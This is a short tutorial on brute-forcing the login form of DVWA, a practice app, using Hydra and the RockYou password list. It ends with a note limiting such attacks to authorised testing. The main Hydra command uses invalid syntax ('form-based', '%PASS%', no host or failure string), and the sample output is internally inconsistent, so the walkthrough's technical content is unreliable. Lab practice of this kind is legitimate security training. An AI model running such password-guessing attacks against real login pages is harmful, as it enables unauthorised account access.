TL;DR
This guide shows you how to crack the brute force login page on DVWA v1.0.7 using the Hydra tool. We’ll use a common password list and demonstrate a basic attack command.
Prerequisites
- A running instance of DVWA (v1.0.7).
- Hydra installed on your Kali Linux machine or similar. You can install it with:
sudo apt update && sudo apt install hydra - Basic understanding of the command line.
Steps
- Find the Login Form URL
- In DVWA, navigate to the ‘Brute Force’ module.
- Note the URL of the login form. It will likely be something like
http://localhost/dvwa/brute_force.php. Replace this with your actual DVWA URL in the following steps.
- Download a Password List
- You’ll need a password list to try different combinations. A common one is RockYou.txt. You can download it from various sources online (be careful about where you download files from!). For example:
wget https://crackstation.net/files/rockyou.txt.gz - Unzip the file:
gunzip rockyou.txt.gz
- You’ll need a password list to try different combinations. A common one is RockYou.txt. You can download it from various sources online (be careful about where you download files from!). For example:
- Run Hydra
- Open a terminal and use the following command to start the attack. Important: Adjust the username, password list path, and DVWA URL as needed!
hydra -l admin -P /path/to/rockyou.txt http-post-form "http://localhost/dvwa/brute_force.php" form-based "username=admin&password=%PASS%"-l admin: Specifies the username to use (in this case, ‘admin’).-P /path/to/rockyou.txt: Specifies the path to your password list file. Replace `/path/to/rockyou.txt` with the actual location of the rockyou.txt file on your system.http-post-form: Tells Hydra to use an HTTP POST form attack."http://localhost/dvwa/brute_force.php": The URL of the login form. Replace with your DVWA URL.form-based "username=admin&password=%PASS%": Specifies that it’s a form-based login and defines the POST parameters. `%PASS%` is replaced by each password in the list.
- Open a terminal and use the following command to start the attack. Important: Adjust the username, password list path, and DVWA URL as needed!
- Monitor the Output
- Hydra will start trying different passwords from your list. Watch the terminal output for successful login attempts. If a password is found, it will be displayed in the output.
[STATUS] 192 targets scanned in 0.00 seconds (178 req/sec)[LOGIN] admin:password123@localhost/dvwa/brute_force.php - VALID
- Hydra will start trying different passwords from your list. Watch the terminal output for successful login attempts. If a password is found, it will be displayed in the output.
- Log in to DVWA
- Once you have a valid username and password, log in to the DVWA application using those credentials.
Important Considerations
- Rate Limiting: DVWA may implement rate limiting which will slow down or block your attack if you send too many requests too quickly.
- Password List Quality: The success of this attack depends heavily on the quality and size of your password list.
- Ethical Hacking: Only perform these attacks on systems you have explicit permission to test. Unauthorized access is illegal and unethical.